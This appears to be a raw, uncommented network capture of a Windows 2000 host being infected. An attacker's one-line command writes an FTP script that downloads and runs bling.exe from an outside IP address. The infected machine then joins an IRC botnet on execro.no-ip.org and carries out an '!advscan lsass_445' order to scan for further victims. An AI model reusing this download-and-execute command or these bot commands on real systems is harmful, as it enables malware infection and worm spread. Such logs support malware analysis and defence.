Server: echo open 78.3.121.118 26706 > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
ATTACKER:	echo open 78.3.121.118 26706 > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe 
ATTACKER:	220 StnyFtpd 0wns j0 
VICTIM:  	USER 1 
ATTACKER:	331 Password required 
VICTIM:  	PASS 1 
ATTACKER:	230 User logged in. 
VICTIM:  	PORT 192,168,1,20,4, 
ATTACKER:	200 PORT command successful. 
ATTACKER:	RETR bling.exe 
ATTACKER:	150 Opening BINARY mode data connection 
ATTACKER:	226 Transfer complete. 
VICTIM:  	QUIT 
ATTACKER:	221 Goodbye happy r00ting. 
VICTIM:  	NICK [r00x-eXe]-411878USER tqsspjba 0 0 :[r00x-eXe]-411878 
ATTACKER:	:execro.no-ip.org NOTICE AUTH :*** Looking up your hostname... 
ATTACKER:	:execro.no-ip.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead 
ATTACKER:	PING :41057A10 
ATTACKER:	PONG :41057A10 
ATTACKER:	:execro.no-ip.org 001 [r00x-eXe]-411878 :Welcome to the eXe IRC Network [r00x-eXe]-411878!tqsspjba@192.168.1.20:execro.no-ip.org 002 [r00x-eXe]-411878 :Your host is execro.no-ip.org, running version Unreal3.2.7:execro.no-ip.org 003 [r00x-eXe]-411878 :This server was created Fri Jul 13 19:22:25 2007:execro.no-ip.org 004 [r00x-eXe]-411878 execro.no-ip.org Unreal3.2.7 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj:execro.no-ip.org 005 [r00x-eXe]-411878 NAMESX SAFELIST HCN MAXCHANNELS=100 CHANLIMIT=#:100 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server:execro.no-ip.org 005 [r00x-eXe]-411878 WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=eXe CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server:execro.no-ip.org 005 [r00x-eXe]-411878 CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server 
VICTIM:  	JOIN #xx vegas 
ATTACKER:	:execro.no-ip.org 251 [r00x-eXe]-411878 :There are 1 users and 8 invisible on 1 servers:execro.no-ip.org 252 [r00x-eXe]-411878 1 :operator(s) online:execro.no-ip.org 254 [r00x-eXe]-411878 4 :channels formed:execro.no-ip.org 255 [r00x-eXe]-411878 :I have 9 clients and 0 servers:execro.no-ip.org 265 [r00x-eXe]-411878 :Current Local Users: 9  Max: 40:execro.no-ip.org 266 [r00x-eXe]-411878 :Current Global Users: 9  Max: 23:execro.no-ip.org 422 [r00x-eXe]-411878 :MOTD File is missing:[r00x-eXe]-411878 MODE [r00x-eXe]-411878 :+iwx 
VICTIM:  	USERHOST [r00x-eXe]-411878MODE [r00x-eXe]-411878 -xJOIN #xx vegasUSERHOST [r00x-eXe]-411878MODE [r00x-eXe]-411878 -xJOIN #xx vegasUSERHOST [r00x-eXe]-411878MODE [r00x-eXe]-411878 -xJOIN #xx vegasUSERHOST [r00x-eXe]-411878MODE [r00x-eXe]-411878 -xJOIN #xx vegas 
ATTACKER:	:[r00x-eXe]-411878!tqsspjba@E1032A00.2D106CDC.1F3B9FD7.IP JOIN :#xx:execro.no-ip.org 332 [r00x-eXe]-411878 #xx :!advscan lsass_445 100 10 0 x.x.x.x:execro.no-ip.org 333 [r00x-eXe]-411878 #xx eXe 1194516415:execro.no-ip.org 353 [r00x-eXe]-411878 = #xx :[r00x-eXe]-411878 [r00x-eXe]-730462 [r00x-eXe]-413853 [r00x-eXe]-885325 [r00x-eXe]-783974 [r00x-eXe]-102788 eXe :execro.no-ip.org 366 [r00x-eXe]-411878 #xx :End of /NAMES list. 
VICTIM:  	PRIVMSG #xx :[SCAN]: Random Scan Started : x.x.x.x:445  delay  10 secs  0 using 100 threads. 
ATTACKER:	:execro.no-ip.org 302 [r00x-eXe]-411878 :[r00x-eXe]-411878=+tqsspjba@192.168.1.20    :[r00x-eXe]-411878 MODE [r00x-eXe]-411878 :-x:execro.no-ip.org 302 [r00x-eXe]-411878 :[r00x-eXe]-411878=+tqsspjba@192.168.1.20    :execro.no-ip.org 302 [r00x-eXe]-411878 :[r00x-eXe]-411878=+tqsspjba@192.168.1.20